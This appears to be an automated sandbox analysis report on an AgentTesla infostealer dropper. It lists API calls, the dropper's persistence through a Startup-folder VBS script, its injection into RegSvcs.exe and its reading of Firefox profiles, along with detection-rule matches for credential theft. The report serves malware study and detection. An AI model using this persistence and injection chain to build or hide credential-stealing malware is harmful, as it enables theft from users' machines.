                    Source: troopwise.exe, 00000001.00000002.1764206020.0000000000605000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c7293abb-1
                    Source: troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_34e09279-f
                    Source: troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_dddf5778-3
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E83633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00E83633
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0C27C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00F0C27C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0C220 NtdllDialogWndProc_W,0_2_00F0C220
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00F0C49C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F0C788
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00F0C8EE
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0C86D SendMessageW,NtdllDialogWndProc_W,0_2_00F0C86D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CBF9 NtdllDialogWndProc_W,0_2_00F0CBF9
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CBAE NtdllDialogWndProc_W,0_2_00F0CBAE
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CB7F NtdllDialogWndProc_W,0_2_00F0CB7F
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CB50 NtdllDialogWndProc_W,0_2_00F0CB50
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00F0CC2E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00F0CD6C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E81287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,0_2_00E81287
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E81290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00E81290
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E816DE GetParent,NtdllDialogWndProc_W,0_2_00E816DE
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0D6C6 NtdllDialogWndProc_W,0_2_00F0D6C6
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E816B5 NtdllDialogWndProc_W,0_2_00E816B5
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8167D NtdllDialogWndProc_W,0_2_00E8167D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00F0D74C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8189B NtdllDialogWndProc_W,0_2_00E8189B
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0DA9A NtdllDialogWndProc_W,0_2_00F0DA9A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00F0BF4D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00553633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,1_2_00553633
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC27C ReleaseCapture,ChrCmpIA,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,1_2_005DC27C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC220 NtdllDialogWndProc_W,1_2_005DC220
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,1_2_005DC49C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,1_2_005DC788
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC86D SendMessageW,NtdllDialogWndProc_W,1_2_005DC86D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DC8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,1_2_005DC8EE
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCB50 NtdllDialogWndProc_W,1_2_005DCB50
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCB7F NtdllDialogWndProc_W,1_2_005DCB7F
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCBF9 NtdllDialogWndProc_W,1_2_005DCBF9
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCBAE NtdllDialogWndProc_W,1_2_005DCBAE
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCC2E ClientToScreen,NtdllDialogWndProc_W,1_2_005DCC2E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCD6C GetWindowLongW,NtdllDialogWndProc_W,1_2_005DCD6C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DCDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_005DCDAC
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00551290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,1_2_00551290
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00551287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745EC8D0,NtdllDialogWndProc_W,1_2_00551287
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055167D NtdllDialogWndProc_W,1_2_0055167D
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005516DE GetParent,NtdllDialogWndProc_W,1_2_005516DE
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DD6C6 NtdllDialogWndProc_W,1_2_005DD6C6
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005516B5 NtdllDialogWndProc_W,1_2_005516B5
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DD74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,1_2_005DD74C
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055189B NtdllDialogWndProc_W,1_2_0055189B
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DDA9A NtdllDialogWndProc_W,1_2_005DDA9A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005DBF4D NtdllDialogWndProc_W,CallWindowProcW,1_2_005DBF4D
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00EE40B1
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746D5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00ED8858
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00EE545F
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_005B545F
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EADBB50_2_00EADBB5
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8E0600_2_00E8E060
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F0804A0_2_00F0804A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E941400_2_00E94140
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA24050_2_00EA2405
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB65220_2_00EB6522
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB267E0_2_00EB267E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F006650_2_00F00665
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E968430_2_00E96843
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA283A0_2_00EA283A
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8E8000_2_00E8E800
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB89DF0_2_00EB89DF
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F00AE20_2_00F00AE2
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB6A940_2_00EB6A94
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E98A0E0_2_00E98A0E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EDEB070_2_00EDEB07
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EE8B130_2_00EE8B13
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EACD610_2_00EACD61
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB70060_2_00EB7006
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E931900_2_00E93190
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E9710E0_2_00E9710E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E812870_2_00E81287
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA33C70_2_00EA33C7
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EAF4190_2_00EAF419
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA16C40_2_00EA16C4
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E956800_2_00E95680
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E958C00_2_00E958C0
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA78D30_2_00EA78D3
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA1BB80_2_00EA1BB8
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB9D050_2_00EB9D05
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E8FE400_2_00E8FE40
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EABFE60_2_00EABFE6
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EA1FD00_2_00EA1FD0
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_011934380_2_01193438
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057DBB51_2_0057DBB5
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005D804A1_2_005D804A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055E0601_2_0055E060
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005641401_2_00564140
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005724051_2_00572405
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005865221_2_00586522
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0058267E1_2_0058267E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005D06651_2_005D0665
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005668431_2_00566843
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055E8001_2_0055E800
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057283A1_2_0057283A
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005889DF1_2_005889DF
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00568A0E1_2_00568A0E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005D0AE21_2_005D0AE2
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00586A941_2_00586A94
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B8B131_2_005B8B13
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005AEB071_2_005AEB07
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057CD611_2_0057CD61
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005870061_2_00587006
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0056710E1_2_0056710E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005631901_2_00563190
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005512871_2_00551287
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005733C71_2_005733C7
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057F4191_2_0057F419
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005716C41_2_005716C4
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005656801_2_00565680
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005778D31_2_005778D3
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005658C01_2_005658C0
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00571BB81_2_00571BB8
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00589D051_2_00589D05
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0055FE401_2_0055FE40
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00571FD01_2_00571FD0
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_0057BFE61_2_0057BFE6
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_00FE2E601_2_00FE2E60
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: String function: 00EA0D27 appears 70 times
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: String function: 00EA8B40 appears 42 times
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: String function: 00E87F41 appears 35 times
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: String function: 00570D27 appears 70 times
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: String function: 00578B40 appears 42 times
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: String function: 00557F41 appears 35 times
                    Source: LfZAz7DQzo.exeStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: troopwise.exe.0.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: LfZAz7DQzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEA2D5 GetLastError,FormatMessageW,0_2_00EEA2D5
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED8713 AdjustTokenPrivileges,CloseHandle,0_2_00ED8713
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00ED8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00ED8CC3
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005A8713 AdjustTokenPrivileges,CloseHandle,1_2_005A8713
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_005A8CC3
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EEB59E
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EFF121
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00EF86D0
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E84FE9
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeFile created: C:\Users\user\AppData\Local\seskinJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeFile created: C:\Users\user\AppData\Local\Temp\aut1A31.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: LfZAz7DQzo.exeReversingLabs: Detection: 71%
                    Source: LfZAz7DQzo.exeVirustotal: Detection: 61%
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeFile read: C:\Users\user\Desktop\LfZAz7DQzo.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\LfZAz7DQzo.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe"
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe"
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeSection loaded: wininet.dllJump to behavior
